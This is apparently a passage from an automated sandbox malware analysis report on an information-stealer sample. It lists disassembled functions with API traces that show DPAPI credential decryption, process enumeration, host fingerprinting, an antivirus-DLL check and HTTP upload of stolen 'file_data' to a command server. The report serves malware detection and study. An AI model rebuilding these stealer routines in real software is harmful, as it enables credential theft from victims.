                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1799959500-0
                                                                                                                                                                                                                            • Opcode ID: df2519ba6d108fdc8b71c082039c9bc3bb26964c19a844e6744d04e068c13488
                                                                                                                                                                                                                            • Instruction ID: dfa50e9b2d92f41fe19a6e116423a8dfd4d95ce18993e0e6c6816f44e1c7b9ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df2519ba6d108fdc8b71c082039c9bc3bb26964c19a844e6744d04e068c13488
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8018671500224ABDB249B60DD44FEE7BBD9F04301F8400E6E40DD2291D7788F949B25
                                                                                                                                                                                                                            Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080D8
                                                                                                                                                                                                                            • LocalFree.KERNEL32(0040CB6A,?,?,0040823B,0040CB6A,?,?,?,?,?,?,?,0040CC65,?,?), ref: 004080FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                            • String ID: DPAPI
                                                                                                                                                                                                                            • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                            • Opcode ID: 71843aaf0a7933e65d977fae079d0a2f5d5a43d1982792f3285d4ffad2c25dc6
                                                                                                                                                                                                                            • Instruction ID: 5332633284173789c767692548fdca268c5249f85a7424e749217d90e47653fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71843aaf0a7933e65d977fae079d0a2f5d5a43d1982792f3285d4ffad2c25dc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC01EC75A01218EFCB04DFA8D88489EBBB9FF48714F158466E906E7341D7719F05CB90
                                                                                                                                                                                                                            Function 0041147A Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043670F,?,?), ref: 004114A9
                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004114B9
                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411517
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411522
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 907984538-0
                                                                                                                                                                                                                            • Opcode ID: 804b59de0022c0a22ffba1be1da70e1bd92732a17a177211fa0686da41351996
                                                                                                                                                                                                                            • Instruction ID: 4ea20aa850d654643913a215028a8477d38f7f0d75996d48367efc27095c6f7e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 804b59de0022c0a22ffba1be1da70e1bd92732a17a177211fa0686da41351996
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3411A371A00218A7DB11FB219C85AEE73A9AF44704F00109AF90AB7291CB789FC58F59
                                                                                                                                                                                                                            Function 00410D03 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D1E
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410D25
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410D34
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410D52
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 362916592-0
                                                                                                                                                                                                                            • Opcode ID: e053bf9d0ea2a25b27af1172a1bfc3f5b5eb9bf6fc4c3b7a4649e4a77b228e05
                                                                                                                                                                                                                            • Instruction ID: feaee98c82f226e65d9751a1a55654853175a6affee0276e42e7902f2bb5e1d1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e053bf9d0ea2a25b27af1172a1bfc3f5b5eb9bf6fc4c3b7a4649e4a77b228e05
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19F0E971A00324ABEB04DBB4EC49BAB37B9AB04729F100295F515D72D0DB74AF858B95
                                                                                                                                                                                                                            Function 00410C28 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C3B
                                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1206570057-0
                                                                                                                                                                                                                            • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                                                                                            • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                                                                                                                                            Function 00410F8F Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2452939696-0
                                                                                                                                                                                                                            • Opcode ID: f6cc537a8d259f33440bfcf2a59015abf239682aa6aea29871f9168d6b10e10c
                                                                                                                                                                                                                            • Instruction ID: 3fe8b6109728b161727a24735e2f8503b38c563086272a1cf22f2bb380138bbb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6cc537a8d259f33440bfcf2a59015abf239682aa6aea29871f9168d6b10e10c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EE092B0D1020D9BCF10DFA0EC45ADE77FCAB08308F0054B5A505D3180DA74ABC98F88
                                                                                                                                                                                                                            Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418586), ref: 004014DF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                                                                                            • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                                                                            • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C
                                                                                                                                                                                                                            Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 29 405482-405593 call 4104bc call 4104ee call 404ab6 call 411e32 lstrlenA call 411e32 call 4104bc * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c1f call 41059c call 410562 call 402920 * 2 call 4105de call 41059c call 4105de call 410562 call 402920 * 3 call 4105de call 41059c call 410562 call 402920 * 2 InternetConnectA 49->51 50->51 53 405e64-405eec call 402920 * 4 call 4104ee call 402920 * 3 50->53 51->53 118 4056d4-405712 HttpOpenRequestA 51->118 86 405eee-405f2e call 402920 * 6 call 41d05a 53->86 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->53 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 4270a0 lstrlenA call 4270a0 lstrlenA * 2 call 4270a0 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411ad2 122->309 310 405d79-405db0 call 4104bc call 402920 * 3 122->310 315 405dcb-405dd0 309->315 316 405f2f 309->316 310->86 318 405e11-405e2e InternetReadFile 315->318 320 405e30-405e43 StrCmpCA 318->320 321 405dd2-405dda 318->321 324 405e45-405e46 ExitProcess 320->324 325 405e4c-405e52 InternetCloseHandle 320->325 321->320 323 405ddc-405e0c call 4105de call 410562 call 402920 321->323 323->318 325->119
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                                                                              • Part of subcall function 00411E32: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E708,?,?,?,004128E1,?,?,00000000), ref: 00411E52
                                                                                                                                                                                                                              • Part of subcall function 00411E32: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128E1,?,?,00000000), ref: 00411E5F
                                                                                                                                                                                                                              • Part of subcall function 00411E32: HeapAlloc.KERNEL32(00000000,?,?,?,004128E1,?,?,00000000), ref: 00411E66
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00436976,0043695B,00436957,0043694B), ref: 00405588
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,",file_data,00437848,------,0043783C,?,",00437830,------,00437824,0b3bd69430b7d827b107ba2ed809207d,",build_id,0043780C,------), ref: 00405C67
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00405CB4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00405CD6
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00405D05
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$0b3bd69430b7d827b107ba2ed809207d$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                            • API String ID: 2638065154-188057769
                                                                                                                                                                                                                            • Opcode ID: 30885a7cfd1fbee20c0e1981ae720f23ab08895215b3c2da0da4a7c0043a0f4c
                                                                                                                                                                                                                            • Instruction ID: cffeca1b0dfeb35b510a7fd6e08703f5ef04152c4c5254e8e8f843b90d2d8adf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30885a7cfd1fbee20c0e1981ae720f23ab08895215b3c2da0da4a7c0043a0f4c
